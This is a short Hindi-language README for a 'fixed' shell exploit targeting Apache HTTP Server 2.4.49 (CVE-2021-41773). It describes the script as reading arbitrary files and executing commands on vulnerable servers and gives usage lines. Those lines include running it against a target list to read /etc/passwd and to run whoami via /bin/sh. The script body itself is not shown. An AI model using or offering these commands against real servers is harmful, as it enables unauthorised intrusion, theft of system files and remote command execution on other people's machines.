
Apache HTTP Server 2.4.49 CVE-2021-41773 पाथ ट्रैवर्सल और रिमोट कोड एक्ज़ीक्यूशन भेद्यता के लिए फिक्स्ड शेल एक्सप्लॉइट। कमजोर लक्ष्यों पर मनमानी फाइलें पढ़ता है और कमांड निष्पादित करता है।
यह Apache HTTP Server 2.4.49 की CVE-2021-41773 के रूप में पहचानी गई कमजोरी के लिए एक शोषण है। Exploit-DB पर प्रकाशित शोषण के मूल संस्करण में सिंटैक्स और निष्पादन त्रुटियां थीं, इसलिए इस संस्करण को Linux वातावरण में सही कार्यक्षमता सुनिश्चित करने के लिए सही किया गया है।
if संरचना में गलत सिंटैक्स को ठीक किया गया।for लूप को ठीक किया गया।chmod +x PoC.sh
./50383.sh targets.txt /etc/passwd
targets.txt फ़ाइल (लक्ष्यों की सूची):http://192.168.1.100
http://vulnerable-site.com
/etc/passwd पढ़ने के लिए शोषण का निष्पादन:./50383.sh targets.txt /etc/passwd
./50383.sh targets.txt /bin/sh whoami